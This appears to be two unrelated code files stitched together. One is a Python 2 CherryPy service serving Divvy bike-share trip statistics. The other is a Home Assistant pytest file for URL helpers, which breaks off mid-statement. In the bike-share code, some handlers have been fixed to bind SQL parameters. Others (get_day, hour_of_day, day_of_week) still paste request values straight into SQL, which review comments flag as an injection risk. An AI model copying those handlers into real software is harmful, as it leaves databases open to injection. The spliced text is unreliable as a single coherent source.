    q = """
        SELECT
            usertype,
            count(*)
        FROM
            divvy_trips_distances
        %s
        GROUP BY
            usertype
    """ % where
    c.execute(q, params or None)
    ret = ["Type,Count"]
    for row in c.fetchall():
        ret.append("%s,%d" % (row[0], row[1]))
    return "\n".join(ret)
usertype.exposed = True
def age(self,
        date=None,
        gender=None,
        subscriber=None,
        age=None,
        stations=None):
    """Displays statistics on age, based on filters.

    Args (all optional):
        date - string - a start date, e.g. "2013-06-27"
        gender - string - Male or Female
        subscriber - string - Subscriber or Customer
        age - a string like "low,high" (both bounds exclusive)
        stations - a string like "station_id1,station_id2,station_id3"

    Returns:
        a csv like Age,Count with one row per display bucket.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    # SECURITY FIX: request values are bound as query parameters instead
    # of being %-interpolated into the SQL text (SQL injection).
    where_stmts = []
    params = []
    if date:
        where_stmts.append("startdate like %s")
        params.append(date)
    if gender:
        where_stmts.append("gender like %s")
        params.append(gender)
    if subscriber:
        # Match the stored usertype by prefix, e.g. "Subscriber%".
        where_stmts.append("usertype like %s")
        params.append(subscriber + "%")
    if age:
        bottom, top = age.split(",")
        where_stmts.append("age_in_2014 < %s")
        params.append(top)
        where_stmts.append("age_in_2014 > %s")
        params.append(bottom)
    if stations:
        # Since it's bikes out, we only look at the departing station.
        station_ids = stations.split(",")
        where_stmts.append("from_station_id in (%s)"
                           % ", ".join(["%s"] * len(station_ids)))
        params.extend(station_ids)
    where = ("WHERE " + " AND ".join(where_stmts)) if where_stmts else ""
    q = """
        SELECT
            age_in_2014,
            count(*)
        FROM
            divvy_trips_distances
        %s
        GROUP BY
            age_in_2014
    """ % where
    c.execute(q, params or None)
    # Bucket per-age counts into display groups.  NULL ages are skipped
    # explicitly (the original's comparisons never matched None either,
    # but relying on Python 2 None-ordering was fragile).
    undertwenty = twenties = thirties = forties = fifties = sixtyplus = 0
    for row in c.fetchall():
        value, n = row[0], row[1]
        if value is None:
            continue
        if 0 < value < 20:
            undertwenty += n
        elif 19 < value < 30:
            twenties += n
        elif 29 < value < 40:
            thirties += n
        elif 39 < value < 50:
            forties += n
        elif 49 < value < 60:
            fifties += n
        elif value > 59:
            sixtyplus += n
    ret = [
        "Age,Count",
        "Under 20,%s" % undertwenty,
        "20-29,%s" % twenties,
        "30-39,%s" % thirties,
        "40-49,%s" % forties,
        "50-59,%s" % fifties,
        "60+,%s" % sixtyplus,
    ]
    return "\n".join(ret)
age.exposed = True
def outflow(self, station_id,
            gender=None,
            subscriber=None,
            age=None):
    """Displays outflow data (departures) for a station, based on filters.

    Args:
        station_id - int - required
        gender (optional) - string - Male or Female
        subscriber (optional) - string - Subscriber or Customer
        age (optional) - a string like "low,high" (both bounds exclusive)

    Returns:
        a csv like to_station,count
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    # SECURITY FIX: all request values (including station_id) are bound
    # as query parameters instead of being %-interpolated into the SQL.
    filters = []
    params = [station_id]
    if gender:
        filters.append("AND gender like %s")
        params.append(gender)
    if subscriber:
        # Match the stored usertype by prefix, e.g. "Subscriber%".
        filters.append("AND usertype like %s")
        params.append(subscriber + "%")
    if age:
        bottom, top = age.split(",")
        filters.append("AND age_in_2014 < %s")
        params.append(top)
        filters.append("AND age_in_2014 > %s")
        params.append(bottom)
    q = ("SELECT to_station_id, count(*) "
         "FROM divvy_trips_distances "
         "WHERE from_station_id = %s " + " ".join(filters) +
         " GROUP BY to_station_id")
    c.execute(q, params)
    ret = ["to_station,count"]
    for row in c.fetchall():
        ret.append("%s,%d" % (row[0], row[1]))
    return "\n".join(ret)
outflow.exposed = True
def inflow(self, station_id,
           gender=None,
           subscriber=None,
           age=None):
    """Displays inflow data (arrivals) for a station, based on filters.

    Args:
        station_id - int - required
        gender (optional) - string - Male or Female
        subscriber (optional) - string - Subscriber or Customer
        age (optional) - a string like "low,high" (both bounds exclusive)

    Returns:
        a csv like from_station,count
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    # SECURITY FIX: all request values (including station_id) are bound
    # as query parameters instead of being %-interpolated into the SQL.
    filters = []
    params = [station_id]
    if gender:
        filters.append("AND gender like %s")
        params.append(gender)
    if subscriber:
        # Match the stored usertype by prefix, e.g. "Subscriber%".
        filters.append("AND usertype like %s")
        params.append(subscriber + "%")
    if age:
        bottom, top = age.split(",")
        filters.append("AND age_in_2014 < %s")
        params.append(top)
        filters.append("AND age_in_2014 > %s")
        params.append(bottom)
    q = ("SELECT from_station_id, count(*) "
         "FROM divvy_trips_distances "
         "WHERE to_station_id = %s " + " ".join(filters) +
         " GROUP BY from_station_id")
    c.execute(q, params)
    ret = ["from_station,count"]
    for row in c.fetchall():
        ret.append("%s,%d" % (row[0], row[1]))
    return "\n".join(ret)
inflow.exposed = True
def station_popularity(self, station_name):
    """Display the popularity group for a specific station.

    Args:
        station_name - string - the station name.

    Returns:
        A string - one of 7 popularity groups (0 = most popular), an
        error message if the pickle cannot be read, or None when the
        station appears in no group (unchanged fall-through behavior).
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    # FIX: use the PATH prefix like every other handler instead of a
    # hard-coded deployment path (store_popularity_groups writes relative
    # to PATH), and narrow the bare except so KeyboardInterrupt /
    # SystemExit are not swallowed.
    try:
        with open(os.path.join(PATH, "popularity.pickle"), "rb") as f:
            pop = pickle.load(f)
    except Exception:
        return "can't open file in cwd: %s" % subprocess.check_output(["pwd"])
    for group in pop:
        if station_name in pop[group]:
            return str(group)
station_popularity.exposed = True
def get_day(self, date, gender=None,
            subscriber=None,
            age=None,
            stations=None):
    """Get data on an individual day for playback, based on filters.

    Emits two rows per trip (a "start" and an "end" event), ordered by
    event timestamp, so the front end can animate the day.

    Args:
        date - string - required, matched against startdate with LIKE
        gender - string - Male or Female (optional)
        subscriber - string - Subscriber or Customer (optional)
        age - a string like "low,high" (optional)
        stations - a string like "station_id1,station_id2,..." (optional)

    Returns:
        a csv like timestamp,trip_id,start/end,from,flat,flong,to,tlat,tlong
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    # Station id -> (name, lat, long) lookup, produced offline.
    with open(os.path.join(PATH, "station_lat_long.pickle"), "rb") as f:
        stat_lat_long = pickle.load(f)
    where = ""
    if gender or subscriber or age or stations:
        # NOTE(review): filter values are %-interpolated into the SQL
        # (injection risk), like the other handlers -- fix together.
        where_stmts = []
        if gender:
            where_stmts.append("gender like '%s' " % gender)
        if subscriber:
            where_stmts.append("usertype like '%s%%' " % subscriber)
        if age:
            bottom, top = age.split(",")
            where_stmts.append("age_in_2014 < %s " % top)
            where_stmts.append("age_in_2014 > %s " % bottom)
        if stations:
            # since its bikes out, we'll only look at the departing station
            stations = stations.split(",")
            where_stmts.append("from_station_id in ('%s')" % \
                "', '".join([str(i) for i in stations]))
        where = where + where_stmts[0]
        for stmt in where_stmts[1:]:
            where += "AND " + stmt + " "
    if not where:
        q = """
        SELECT
            starttime,
            stoptime,
            trip_id,
            from_station_id,
            to_station_id
        FROM
            divvy_trips_distances
        WHERE
            startdate like '%s'
        ORDER BY
            stoptime ASC""" % date
    else:
        q = """
        SELECT
            starttime,
            stoptime,
            trip_id,
            from_station_id,
            to_station_id
        FROM
            divvy_trips_distances
        WHERE
            startdate like '%s' AND %s
        ORDER BY
            stoptime ASC""" % (date, where)
    print "assembled q = %s" % q
    ret = []
    ret.append("timestamp,trip_id,start/end,from,flat,flong,to,tlat,tlong")
    c.execute(q)
    # data maps a running index to the event tuple; keylist maps the same
    # index to the event's parsed timestamp, so events can be re-sorted
    # by time below while duplicates keep distinct indices.
    data = OrderedDict()
    keylist = {}
    i = 0
    for row in c.fetchall():
        keylist[i] = parser.parse(row[0])
        data[i] = (  # start timestamp
            row[2],  # trip id
            "start",
            stat_lat_long[row[3]][0],  # from station name
            stat_lat_long[row[3]][1],  # from lat
            stat_lat_long[row[3]][2],  # from long
            stat_lat_long[row[4]][0],  # to station name
            stat_lat_long[row[4]][1],  # to lat
            stat_lat_long[row[4]][2]   # to long
        )
        i = i+1
        # now we do the same thing again but for the end of the trip
        keylist[i] = parser.parse(row[1])
        data[i] = (  # end timestamp
            row[2],  # trip id
            "end",
            stat_lat_long[row[3]][0],  # from station name
            stat_lat_long[row[3]][1],  # from lat
            stat_lat_long[row[3]][2],  # from long
            stat_lat_long[row[4]][0],  # to station name
            stat_lat_long[row[4]][1],  # to lat
            stat_lat_long[row[4]][2]   # to long
        )
        i = i+1
    # NOTE(review): dict.values() followed by in-place .sort() is
    # Python 2 only (values() is a view in py3).
    keys = keylist.values()
    keys.sort()
    for key in keys:
        l = [key.strftime('%m/%d/%Y %H:%M%p')]
        # Find one still-unconsumed event with this timestamp; popping it
        # makes duplicate timestamps each match a different event.
        for j, keylookup, in keylist.items():
            if key == keylookup:
                l.extend(data[j])
                keylist.pop(j)
                break
        l = tuple(l)
        ret.append("%s,%s,%s,%s,%s,%s,%s,%s,%s" % l)
    return "\n".join(ret)
get_day.exposed = True
def bikes_out_by_day(self, time_of_day=None,
                     gender=None,
                     subscriber=None,
                     age=None,
                     stations=None):
    """Display the number of rides on each day of the year, with filters.

    Args (all optional):
        time_of_day - currently unused (reserved; see the original TODO)
        gender - string - Male or Female
        subscriber - string - Subscriber or Customer
        age - a string group label understood by parse_age, e.g. "20-29"
        stations - a string like "station_id1,station_id2,station_id3"

    Returns:
        a csv like Date,Count; Date is only filled in for axis-label rows
        (first of each month and the June 27 2013 launch day).

    Fixes vs. original: the def was missing "self" (CherryPy bound the
    instance to time_of_day); WHERE terms were joined with the typo
    "AMD"; the launch-day comparison used the unbound .date method; and
    filter values are now bound as SQL parameters, not interpolated.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    where_stmts = []
    params = []
    if gender:
        where_stmts.append("gender like %s")
        params.append(gender)
    if subscriber:
        where_stmts.append("usertype like %s")
        params.append(subscriber)
    if age:
        bottom, top = parse_age(age)
        where_stmts.append("age_in_2014 < %s")
        params.append(top)
        where_stmts.append("age_in_2014 > %s")
        params.append(bottom)
    if stations:
        # Since it's bikes out, we only look at the departing station.
        station_ids = stations.split(",")
        where_stmts.append("from_station_id in (%s)"
                           % ", ".join(["%s"] * len(station_ids)))
        params.extend(station_ids)
    where = ("WHERE " + " AND ".join(where_stmts)) if where_stmts else ""
    q = """
        SELECT
            startdate,
            count(*)
        FROM
            divvy_trips_distances
        %s
        GROUP BY
            startdate
    """ % where
    c.execute(q, params or None)
    ret = ["Date,Count"]
    launch_day = parser.parse('2013-06-27').date()
    for row in c.fetchall():
        dt = row[0]
        if dt == launch_day:
            date = 'June 27, 2013'
        elif dt.day == 1:
            date = "%s %s" % (dt.strftime("%b"), dt.year)
        else:
            date = " "
        ret.append("%s,%s" % (date, row[1]))
    return "\n".join(ret)
bikes_out_by_day.exposed = True
def hour_of_day(self, date=None,
                gender=None,
                subscriber=None,
                age=None,
                stations=None):
    """Histogram of trip start hours (0-23) as a JSON-like array.

    Results are cached twice under a key derived from the filter values:
    the final JSON text, and the intermediate (trip_id, starttime) rows.
    A request with no filters uses the empty cache key.

    Returns:
        JSON-ish text: a list of {"range": hour, "frequency": count}.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    sql = []
    cache_string = ""
    where = ""
    if date or gender or subscriber or age or stations:
        # lets do some ghetto caching: the cache key is just the filter
        # values concatenated (slashes/spaces stripped from the date).
        cache_string = ""
        if date:
            cache_string += date.replace(" ", "").replace("/", "")
        if gender:
            cache_string += gender
        if subscriber:
            cache_string += subscriber
        if age:
            cache_string += age
        if stations: cache_string += stations
    # Fast path: the fully rendered JSON is already cached.
    # NOTE(review): bare excepts here are deliberate best-effort cache
    # reads, but they also hide real errors (e.g. bad pickles).
    try:
        with open ("%s/%s_trip_id_starttime_hours.json" % \
            (os.path.join(PATH,"cache"), cache_string), "rb") as f:
            return f.read()
    except:
        pass
    # Second-level cache: the raw (trip_id, parsed starttime) rows.
    try:
        with open ("%s/%s_trip_id_starttime.pickle" % \
            (os.path.join(PATH,"cache"), cache_string), "rb") as f:
            sql = pickle.load(f)
            print "running from cached version"
    except:
        print "running from SQL"
        # NOTE(review): filter values are %-interpolated into the SQL
        # (injection risk), like the other handlers -- fix together.
        where = "WHERE "
        where_stmts = []
        if date:
            where_stmts.append("startdate like '%s'" % date)
        if gender:
            where_stmts.append("gender like '%s'" % gender)
        if subscriber:
            where_stmts.append("usertype like '%s'" % subscriber)
        if age:
            bottom, top = parse_age(age)
            where_stmts.append("age_in_2014 < %d" % top)
            where_stmts.append("age_in_2014 > %d" % bottom)
        if stations:
            stations = stations.split(",")
            # since its bikes out, we'll only look at the departing station
            where_stmts.append("from_station_id in (%s)" % \
                ", ".join(stations))
        if where_stmts:
            where = where + where_stmts[0]
            for stmt in where_stmts[1:]:
                where += "AND " + stmt + " "
        else:
            where = ""
        q = """
        SELECT
            trip_id,
            starttime
        FROM
            divvy_trips_distances
        %s
        GROUP BY
            trip_id
        """ % where
        c.execute(q)
        sql = []
        for row in c.fetchall():
            sql.append((row[0],parser.parse(row[1])))
        with open ("%s/%s_trip_id_starttime.pickle" % \
            (os.path.join(PATH,"cache"), cache_string), "wb") as f:
            pickle.dump(sql, f)
    # Count trips per start hour (0-23).
    ret = []
    ret.append("[")
    d = {}
    for i in range(0, 24):
        count = 0
        d[i] = count
    for row in sql:
        for i in range(0,24):
            if i == row[1].hour:
                d[i] += 1
    for i in range(0, 24):
        ret.append('{"range":"%d", "frequency":"%d"},' % (i, d[i]))
    # Strip the trailing comma from the final element to keep the
    # bracketed list JSON-parseable.
    ret[len(ret)-1] = ret[len(ret)-1].rstrip(",")
    ret.append("]")
    # Store the rendered JSON for the fast path above.
    with open ("%s/%s_trip_id_starttime_hours.json" % \
        (os.path.join(PATH,"cache"), cache_string), "wb") as f:
        f.write("\n".join(ret))
    return "\n".join(ret)
hour_of_day.exposed = True
def day_of_week(self, date=None,
                gender=None,
                subscriber=None,
                age=None,
                stations=None):
    """Histogram of trip start days (Sun-Sat) as a JSON-like array.

    Shares the two-level cache scheme (and cache key format) with
    hour_of_day: rendered JSON first, then raw (trip_id, starttime) rows.

    Returns:
        JSON-ish text: a list of {"range": day, "frequency": count}.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    sql = []
    cache_string = ""
    # lets do some ghetto caching
    where = ""
    if date or gender or subscriber or age or stations:
        # The cache key is the filter values concatenated.
        if date:
            cache_string += date.replace(" ", "").replace("/", "")
        if gender:
            cache_string += gender
        if subscriber:
            cache_string += subscriber
        if age:
            cache_string += age
        if stations: cache_string += stations
    # Fast path: the rendered JSON is already cached.
    # NOTE(review): bare excepts are deliberate best-effort cache reads,
    # but they also hide real errors (e.g. bad pickles).
    try:
        with open ("%s/%s_trip_id_starttime_days.json" % \
            (os.path.join(PATH,"cache"), cache_string), "rb") as f:
            return f.read()
    except:
        pass
    # Second-level cache: the raw (trip_id, parsed starttime) rows.
    try:
        with open ("%s/%s_trip_id_starttime.pickle" % \
            (os.path.join(PATH,"cache"), cache_string), "rb") as f:
            sql = pickle.load(f)
            print "running from cached version"
    except:
        print "running from SQL"
        # NOTE(review): filter values are %-interpolated into the SQL
        # (injection risk), like the other handlers -- fix together.
        where = "WHERE "
        where_stmts = []
        if date:
            where_stmts.append("startdate like '%s'" % date)
        if gender:
            where_stmts.append("gender like '%s'" % gender)
        if subscriber:
            where_stmts.append("usertype like '%s'" % subscriber)
        if age:
            bottom, top = parse_age(age)
            where_stmts.append("age_in_2014 < %d" % top)
            where_stmts.append("age_in_2014 > %d" % bottom)
        if stations:
            stationsstr = stations  # NOTE(review): unused
            stations = stations.split(",")
            # since its bikes out, we'll only look at the departing station
            where_stmts.append("from_station_id in (%s)" % \
                ", ".join(stations))
        if where_stmts:
            where = where + where_stmts[0]
            for stmt in where_stmts[1:]:
                where += "AND " + stmt + " "
        else:
            where = ""
        q = """
        SELECT
            trip_id,
            starttime
        FROM
            divvy_trips_distances
        %s
        GROUP BY
            trip_id
        """ % where
        c.execute(q)
        sql = []
        for row in c.fetchall():
            sql.append((row[0],parser.parse(row[1])))
        with open ("%s/%s_trip_id_starttime.pickle" % \
            (os.path.join(PATH,"cache"), cache_string), "wb") as f:
            pickle.dump(sql, f)
    # Count trips per weekday; OrderedDict fixes the output order Sun-Sat.
    ret = []
    ret.append("[")
    days = OrderedDict()
    days["Sun"] = 0
    days["Mon"] = 0
    days["Tue"] = 0
    days["Wed"] = 0
    days["Thu"] = 0
    days["Fri"] = 0
    days["Sat"] = 0
    for row in sql:
        days[row[1].strftime("%a")] += 1
    for day, count in days.items():
        ret.append('{"range":"%s", "frequency":"%d"},' % (day, count))
    # Strip the trailing comma from the final element to keep the
    # bracketed list JSON-parseable.
    ret[len(ret)-1] = ret[len(ret)-1].rstrip(",")
    ret.append("]")
    # Store the rendered JSON for the fast path above.
    with open ("%s/%s_trip_id_starttime_days.json" % \
        (os.path.join(PATH,"cache"), cache_string), "wb") as f:
        f.write("\n".join(ret))
    return "\n".join(ret)
day_of_week.exposed = True
def distance_dist(self, date=None,
                  gender=None,
                  subscriber=None,
                  age=None,
                  stations=None):
    """Histogram of trip distances in km, as a JSON-like array.

    Args (all optional):
        date - currently unused
        gender - string - Male or Female
        subscriber - string - Subscriber or Customer
        age - a string group label understood by parse_age, e.g. "20-29"
        stations - a string like "station_id1,station_id2,station_id3"

    Returns:
        JSON-ish text: a list of {"range": "lo-hi", "frequency": count}.

    NOTE(review): the query GROUPs BY meters, so each *distinct* distance
    value counts once regardless of how many trips covered it -- confirm
    that is intended.  Fixes vs. original: WHERE terms were joined with
    the typo "AMD" (invalid SQL whenever 2+ filters were supplied), and
    filter values are now bound as SQL parameters.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    where_stmts = []
    params = []
    if gender:
        where_stmts.append("gender like %s")
        params.append(gender)
    if subscriber:
        where_stmts.append("usertype like %s")
        params.append(subscriber)
    if age:
        bottom, top = parse_age(age)
        where_stmts.append("age_in_2014 < %s")
        params.append(top)
        where_stmts.append("age_in_2014 > %s")
        params.append(bottom)
    if stations:
        # Since it's bikes out, we only look at the departing station.
        station_ids = stations.split(",")
        where_stmts.append("from_station_id in (%s)"
                           % ", ".join(["%s"] * len(station_ids)))
        params.extend(station_ids)
    where = ("WHERE " + " AND ".join(where_stmts)) if where_stmts else ""
    q = """
        SELECT
            meters
        FROM
            divvy_trips_distances
        %s
        GROUP BY
            meters
    """ % where
    c.execute(q, params or None)
    # Half-km buckets from 0 to 18 km, then one catch-all up to 100 km.
    edges = [x / 2.0 for x in range(37)] + [100]
    ranges = list(zip(edges[:-1], edges[1:]))
    counts = [0] * len(ranges)
    for row in c.fetchall():
        km = float(row[0]) / 1000
        for idx, (lo, hi) in enumerate(ranges):
            if lo < km <= hi:
                counts[idx] += 1
                break
    ret = ["["]
    for (lo, hi), count in zip(ranges, counts):
        ret.append('{ "range": "%s", "frequency": "%d" },'
                   % ("%.1f-%.1f" % (lo, hi), count))
    # Strip the trailing comma so the bracketed list stays parseable.
    ret[-1] = ret[-1].rstrip(",")
    ret.append("]")
    return "\n".join(ret)
distance_dist.exposed = True
def time_dist(self, date=None,
              gender=None,
              subscriber=None,
              age=None,
              stations=None):
    """Histogram of trip durations in minutes, as a JSON-like array.

    Args (all optional):
        date - currently unused
        gender - string - Male or Female
        subscriber - string - Subscriber or Customer
        age - a string group label understood by parse_age, e.g. "20-29"
        stations - a string like "station_id1,station_id2,station_id3"

    Returns:
        JSON-ish text: a list of {"range": "lo-hi", "frequency": count}.

    NOTE(review): the query GROUPs BY seconds, so each *distinct*
    duration counts once -- confirm intended.  Fixes vs. original: WHERE
    terms were joined with the typo "AMD" (invalid SQL with 2+ filters),
    and filter values are now bound as SQL parameters.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    where_stmts = []
    params = []
    if gender:
        where_stmts.append("gender like %s")
        params.append(gender)
    if subscriber:
        where_stmts.append("usertype like %s")
        params.append(subscriber)
    if age:
        bottom, top = parse_age(age)
        where_stmts.append("age_in_2014 < %s")
        params.append(top)
        where_stmts.append("age_in_2014 > %s")
        params.append(bottom)
    if stations:
        # Since it's bikes out, we only look at the departing station.
        station_ids = stations.split(",")
        where_stmts.append("from_station_id in (%s)"
                           % ", ".join(["%s"] * len(station_ids)))
        params.extend(station_ids)
    where = ("WHERE " + " AND ".join(where_stmts)) if where_stmts else ""
    q = """
        SELECT
            seconds
        FROM
            divvy_trips_distances
        %s
        GROUP BY
            seconds
    """ % where
    c.execute(q, params or None)
    # Five-minute buckets from 0 to 150, then one catch-all up to 300.
    edges = list(range(0, 155, 5)) + [300]
    ranges = list(zip(edges[:-1], edges[1:]))
    counts = [0] * len(ranges)
    for row in c.fetchall():
        minutes = float(row[0]) / 60
        for idx, (lo, hi) in enumerate(ranges):
            if lo < minutes <= hi:
                counts[idx] += 1
                break
    ret = ["["]
    for (lo, hi), count in zip(ranges, counts):
        ret.append('{ "range": "%s", "frequency": "%s" },'
                   % ("%d-%d" % (lo, hi), int(count)))
    # Strip the trailing comma so the bracketed list stays parseable.
    ret[-1] = ret[-1].rstrip(",")
    ret.append("]")
    return "\n".join(ret)
time_dist.exposed = True
def weather(self, date, hour):
    """Return a csv "icon,temp" row for the given date and hour.

    Args:
        date - string parseable as a date
        hour - key into the per-day weather pickle
            (NOTE(review): passed through as the raw request string --
            confirm the pickle is keyed by strings).
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    dt = parser.parse(date)
    day_stamp = "%s%02d%02d" % (dt.year, dt.month, dt.day)
    pickle_path = '%s/weather/%s.pickle' % (PATH, day_stamp)
    with open(pickle_path, 'rb') as f:
        winfo = pickle.load(f)
    rows = ["icon,temp", "%s,%s" % winfo[hour]]
    return "\n".join(rows)
weather.exposed = True
def get_morning_trips(self, date):
    """List trips starting in the 6-8am hours on the given date.

    Args:
        date - string - the startdate to match.

    Returns:
        a csv like from_station_id,to_station_id,starttime, ordered by
        start time.

    SECURITY FIX: the date comes straight from the request, so it is
    bound as a query parameter instead of being %-formatted into the SQL.
    starttime is stored as text, hence the LIKE matching on the hour
    ("8:" but not "18:", and so on).  Debug print counter removed.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    q = """
        select
            from_station_id,
            to_station_id,
            starttime
        from
            divvy_trips_distances
        where
            startdate = %s AND (
                (starttime like '%%8:%%' and starttime not like '%%18:%%')
                OR (starttime like '%%6:%%' and starttime not like '%%16:%%')
                OR (starttime like '%%7:%%' and starttime not like '%%17:%%')
            )
        order by
            starttime
    """
    c.execute(q, (date,))
    ret = ["from_station_id,to_station_id,starttime"]
    for row in c.fetchall():
        ret.append("%s,%s,%s" % (row[0], row[1], row[2]))
    return "\n".join(ret)
get_morning_trips.exposed = True
def get_lunch_trips(self, date):
    """List trips starting in the 11am-12pm hours on the given date.

    Args:
        date - string - the startdate to match.

    Returns:
        a csv like from_station_id,to_station_id,starttime, ordered by
        start time.

    SECURITY FIX: the date is bound as a query parameter instead of
    being %-formatted into the SQL.  Debug print counter removed.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    q = """
        select
            from_station_id,
            to_station_id,
            starttime
        from
            divvy_trips_distances
        where
            startdate = %s AND (
                (starttime like '%%11:%%')
                OR (starttime like '%%12:%%')
            )
        order by
            starttime
    """
    c.execute(q, (date,))
    ret = ["from_station_id,to_station_id,starttime"]
    for row in c.fetchall():
        ret.append("%s,%s,%s" % (row[0], row[1], row[2]))
    return "\n".join(ret)
get_lunch_trips.exposed = True
def get_after_work_trips(self, date):
    """List trips starting in the 16:00-18:59 hours on the given date.

    Args:
        date - string - the startdate to match.

    Returns:
        a csv like from_station_id,to_station_id,starttime, ordered by
        start time.

    SECURITY FIX: the date is bound as a query parameter instead of
    being %-formatted into the SQL.  Debug print counter removed.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    q = """
        select
            from_station_id,
            to_station_id,
            starttime
        from
            divvy_trips_distances
        where
            startdate = %s AND (
                (starttime like '%%16:%%')
                OR (starttime like '%%17:%%')
                OR (starttime like '%%18:%%')
            )
        order by
            starttime
    """
    c.execute(q, (date,))
    ret = ["from_station_id,to_station_id,starttime"]
    for row in c.fetchall():
        ret.append("%s,%s,%s" % (row[0], row[1], row[2]))
    return "\n".join(ret)
get_after_work_trips.exposed = True
def get_evening_trips(self, date):
    """List trips starting in the 19:00-20:59 hours on the given date.

    Args:
        date - string - the startdate to match.

    Returns:
        a csv like from_station_id,to_station_id,starttime, ordered by
        start time.

    Fixes vs. original: the second pattern was '%%29:%%' -- hour 29 does
    not exist, so it matched nothing; '20:' is the evident intent (the
    sibling handlers cover 16-18, this one 19-20).  The date is also
    bound as a query parameter instead of being %-formatted into the
    SQL, and the debug print counter is removed.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    q = """
        select
            from_station_id,
            to_station_id,
            starttime
        from
            divvy_trips_distances
        where
            startdate = %s AND (
                (starttime like '%%19:%%')
                OR (starttime like '%%20:%%')
            )
        order by
            starttime
    """
    c.execute(q, (date,))
    ret = ["from_station_id,to_station_id,starttime"]
    for row in c.fetchall():
        ret.append("%s,%s,%s" % (row[0], row[1], row[2]))
    return "\n".join(ret)
get_evening_trips.exposed = True
application = cherrypy.Application(Root(), script_name=None, config=None)
|
|
"""Test network helper."""
from unittest.mock import Mock, patch
import pytest
from homeassistant.components import cloud
from homeassistant.config import async_process_ha_core_config
from homeassistant.core import HomeAssistant
from homeassistant.helpers.network import (
NoURLAvailableError,
_get_cloud_url,
_get_external_url,
_get_internal_url,
_get_request_host,
get_url,
is_internal_request,
)
from tests.common import mock_component
async def test_get_url_internal(hass: HomeAssistant):
    """Test getting an instance URL when the user has set an internal URL.

    Walks through several internal_url configurations (hostname vs IP,
    http vs https, default vs explicit port) and checks _get_internal_url
    under each combination of require_* constraints.
    """
    assert hass.config.internal_url is None
    # No request is in flight yet, so require_current_request cannot match.
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_current_request=True)
    # Test with internal URL: http://example.local:8123
    await async_process_ha_core_config(
        hass,
        {"internal_url": "http://example.local:8123"},
    )
    assert hass.config.internal_url == "http://example.local:8123"
    assert _get_internal_url(hass) == "http://example.local:8123"
    assert _get_internal_url(hass, allow_ip=False) == "http://example.local:8123"
    # Port 8123 is non-standard and the scheme is plain http.
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_standard_port=True)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_ssl=True)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_current_request=True)
    # With a current request whose host matches the configured URL.
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="example.local"
    ):
        assert (
            _get_internal_url(hass, require_current_request=True)
            == "http://example.local:8123"
        )
        with pytest.raises(NoURLAvailableError):
            _get_internal_url(
                hass, require_current_request=True, require_standard_port=True
            )
        with pytest.raises(NoURLAvailableError):
            _get_internal_url(hass, require_current_request=True, require_ssl=True)
    # A request from a non-matching host must not yield the internal URL.
    with patch(
        "homeassistant.helpers.network._get_request_host",
        return_value="no_match.example.local",
    ), pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_current_request=True)
    # Test with internal URL: https://example.local:8123
    await async_process_ha_core_config(
        hass,
        {"internal_url": "https://example.local:8123"},
    )
    assert hass.config.internal_url == "https://example.local:8123"
    assert _get_internal_url(hass) == "https://example.local:8123"
    assert _get_internal_url(hass, allow_ip=False) == "https://example.local:8123"
    assert _get_internal_url(hass, require_ssl=True) == "https://example.local:8123"
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_standard_port=True)
    # Test with internal URL: http://example.local:80/
    await async_process_ha_core_config(
        hass,
        {"internal_url": "http://example.local:80/"},
    )
    assert hass.config.internal_url == "http://example.local:80/"
    # Default ports and trailing slashes are normalized away.
    assert _get_internal_url(hass) == "http://example.local"
    assert _get_internal_url(hass, allow_ip=False) == "http://example.local"
    assert _get_internal_url(hass, require_standard_port=True) == "http://example.local"
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_ssl=True)
    # Test with internal URL: https://example.local:443
    await async_process_ha_core_config(
        hass,
        {"internal_url": "https://example.local:443"},
    )
    assert hass.config.internal_url == "https://example.local:443"
    assert _get_internal_url(hass) == "https://example.local"
    assert _get_internal_url(hass, allow_ip=False) == "https://example.local"
    assert (
        _get_internal_url(hass, require_standard_port=True) == "https://example.local"
    )
    assert _get_internal_url(hass, require_ssl=True) == "https://example.local"
    # Test with internal URL: https://192.168.0.1
    await async_process_ha_core_config(
        hass,
        {"internal_url": "https://192.168.0.1"},
    )
    assert hass.config.internal_url == "https://192.168.0.1"
    assert _get_internal_url(hass) == "https://192.168.0.1"
    assert _get_internal_url(hass, require_standard_port=True) == "https://192.168.0.1"
    assert _get_internal_url(hass, require_ssl=True) == "https://192.168.0.1"
    # An IP-based URL is rejected when a hostname is required.
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, allow_ip=False)
    # Test with internal URL: http://192.168.0.1:8123
    await async_process_ha_core_config(
        hass,
        {"internal_url": "http://192.168.0.1:8123"},
    )
    assert hass.config.internal_url == "http://192.168.0.1:8123"
    assert _get_internal_url(hass) == "http://192.168.0.1:8123"
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_standard_port=True)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_ssl=True)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, allow_ip=False)
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="192.168.0.1"
    ):
        assert (
            _get_internal_url(hass, require_current_request=True)
